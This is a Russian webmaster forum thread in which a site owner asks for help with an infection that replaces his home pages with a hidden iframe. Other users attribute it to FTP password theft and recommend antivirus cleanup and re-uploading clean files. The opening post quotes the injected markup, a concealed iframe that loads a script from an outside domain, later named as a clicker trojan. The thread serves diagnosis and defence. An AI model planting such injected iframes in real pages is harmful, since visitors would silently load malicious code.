Не могу отловить вирус

12 3
W
На сайте с 30.07.2006
Offline
55
1337

Поймал где-то вирусяку, который в вставляет iframe на главную, этот гад заменяет весь код на эту строчку:

<html>
<iframe name="StatPage" src="http://good-traffic.hk/banner/index.php" width=5 height=5 style="display:none"></iframe>
</html>
или
<html>
<AD- me name="StatPage" src="http://good-traffic.hk/banner/index.php" width=5 height=5 style="display:none"><AD- ame>
</html>

Почему-то если заходить на сайты с www, то они нормально открываются, а если без www – то там эта строчка вместо кода, и наоборот. Причем если скачать index.ххх с ftp аккаунта и посмотреть код, то там все чисто.

Что сделал:

Отформатировал HDD, поставил XP с последними обновлениями, проверил Нодом, Касперским, Agnitum outpostом и ad-aware, но ничего не нашел. Поменял пароли к ftp, перезалил сайты, первое время было все ок, но через пару часов долбаный iframe снова прописался почти на всех главных страницах. Такая проблема только на сайтах на одном хостинге, на других хостингах с сайтами пока вроде все ок.

Подскажите плз, как отловить гада, или хотя бы узнать, что там за вирус и как он действует.

Kopernik
На сайте с 17.09.2006
Offline
78
#1

webmastak, может, отформатировать хостинг?

ЗЫ

не помог, так хоть тему поднял... :)

Эксклюзивный контент в промышленных масштабах (/ru/forum/555117) "Наши за границей" (http://zagranicey.ru/) На краю Земли. Блог копирайтера (http://www.kopernik.name/)
Лунный Кот
На сайте с 27.01.2006
Offline
222
#2

webmastak, у кого еще есть доступ к сайтам? все-таки по ФТП скорее всего заражают сайт.

Вы мне свои достижения жизненные продемонстируйте, пожалуйста, я, возможно, возьму свои слова обратно и извинюсь прилюдно. Только думается мне, что вы банальный лась. (с) Mirson
W
На сайте с 30.07.2006
Offline
55
#3
Kopernik:
webmastak, может, отформатировать хостинг?
ЗЫ
не помог, так хоть тему поднял...

Отформатировал, не помогло, описал в поддержку, будут делать бекап, посмотрим, может поможет

ЗЫ, спасибо))

W
На сайте с 30.07.2006
Offline
55
#4
обнаружено: троянская программа Trojan-Clicker.JS.Agent.h URL:

Огромный респект Масолу за определение вируса, вроде бы всего лишь безобидный кликер, только чем его отловить если ни нод32 ни каспер6 не берут((

W
На сайте с 30.07.2006
Offline
55
#5

дубль... хотя нажимал один раз

sud falke
На сайте с 24.11.2006
Offline
60
#6

webmastak, попробуйте Spyware Doctor. Много кому советовал, помогает.

Off: да, с дублями сообщений есть траблы. Gray писал об апгрейде форума /ru/forum/152277

Люблю эту компанию Venta (http://www.promo-venta.ru)
W
На сайте с 30.07.2006
Offline
55
#7
sud falke:
webmastak, попробуйте Spyware Doctor. Много кому советовал, помогает.

sud falke, thanks, если проблемы не у хостера, тогда придется купить и попробовать

W
На сайте с 30.07.2006
Offline
55
#8

дубль

10 дублей

E
На сайте с 05.10.2005
Offline
172
#9

Сейчас в сети появился вирус, который заражает компьютер хозяина сайта, перехватывает подключение к ФТП, крадет пароли и затем портит файлы на хостинге - после чего заражает комп каждого, кто откроет сайт.

Способ лечения единственный - сначала почистить антивирусом с новейшими базами собственный комп и защитить его резидентно. А затем заново загрузить все файлы сайта на хостинг, заменив их проверенными чистыми копиями.

открытая многоязычная словарная база (http://tolmacz.ru)
Fat Bear
На сайте с 01.12.2006
Offline
264
#10
webmastak:
Огромный респект Масолу за определение вируса, вроде бы всего лишь безобидный кликер, только чем его отловить если ни нод32 ни каспер6 не берут((

Да не за что, обращайтесь, если что :)

Открыть счёт в Capitalist ( https://capitalist.net/reg?from=e5707ff0c3 ). Виртуальные карты, USDT, банковские переводы, выплаты партнёрских программ. Push-партнёрка с высоким рейтом hClicks(https://hclicks.com/?ref=61dc0714).
12 3

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий